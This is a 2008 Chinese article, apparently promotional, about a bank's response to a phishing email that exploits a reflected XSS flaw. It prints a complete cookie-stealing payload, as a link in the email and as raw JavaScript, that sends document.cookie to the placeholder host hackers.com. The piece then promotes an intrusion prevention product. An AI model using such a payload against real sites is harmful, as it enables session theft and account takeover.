浅析URL背后的杀机网站防范XSS攻击实录

　2008-12-03 13:37:42　来源：WEB开发网　　　

核心提示： 经过确认，该客户使用的PC并不存在病毒，浅析URL背后的杀机网站防范XSS攻击实录(2)，而且也的确是仅点击了广告邮件的链接而已，“那你把这封邮件发给我看看吧”，采用一款防反射式XSS攻击的浏览器，比如IE8，小陈在排除了其它可能性后，这么告诉客户

经过确认，该客户使用的PC并不存在病毒，而且也的确是仅点击了广告邮件的链接而已。“那你把这封邮件发给我看看吧”，小陈在排除了其它可能性后，这么告诉客户，“分析出结果我们的客服人员将第一时间通知您，您现在的这笔费用我们先冻结，待解决后给您恢复”。

在收到客户转发来的邮件后，小陈第一眼就看出了问题，这不是公司的系统邮件，而是一封钓鱼邮件，伪造了发件人名称的钓鱼邮件。其中关于促销优惠活动的页面都是截取了真实活动页面，但在“点击参加活动”的按钮后面，却隐藏着重重的杀机。

这个链接并非是正常促销活动所在的页面，而是如下所示的一个长URL　

<ahref="http://www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+">点击参加活动</a>

一般的用户在看到URL开头是正确的网站域名ebank，都不会怀疑邮件的真实性，而骇客正是利用这一心理，精心设置了圈套，利用了Ebank的某个输入域中存在反射式XSS攻击漏洞，通过

"varimg=newImage();img.src="http://www.hackers.com/?"+document.cookie;"

这段JavaScript代码来盗取受害者的Cookie。受害者只要点击了这个链接，在正确的ebank页面中操作所留下的Cookie信息，都将被骇客获取，利用这些信息，骇客甚至可以绕过验证机制。这个案例中该客户就是被这样一个长URL欺骗了，好在发现及时，没有造成财产损失。

小陈拿着分析结果去找信息中心沈主任汇报，而沈主任果然经验丰富：“先发布网站紧急通知，告知用户注意不要随意点击链接，然后迅速找专业安全公司做安全服务，查清问题的根源再说。”并立刻联系了专业安全厂商启明星辰的当地销售人员。

经过安星远程网站安全检查服务的检测，发现小陈公司网站存在数个XSS和SQL注入的漏洞，考虑到代码级修改费时太长，沈主任决定双管齐下，一方面找开发人员修补现有漏洞，一方面咨询是否有现成的专业安全产品可以防范XSS攻击。在对比了数家国内外的安全产品后，启明星辰天清入侵防御产品的专业的Web安全防御能力给沈主任留下了深刻的印象，特别是其采用了攻击机理分析方式，在防范XSS攻击和SQL注入方面都有很好的效果。对网银来说，时间可就是真金白银，所以沈主任当机立断先购买一台天清入侵防御系统，并迅速上线。当小陈尝试用原来的长URL进行XSS攻击时，发现天清入侵防御产品信息报警监视台上已经出现了报警信息并进行了及时的阻断。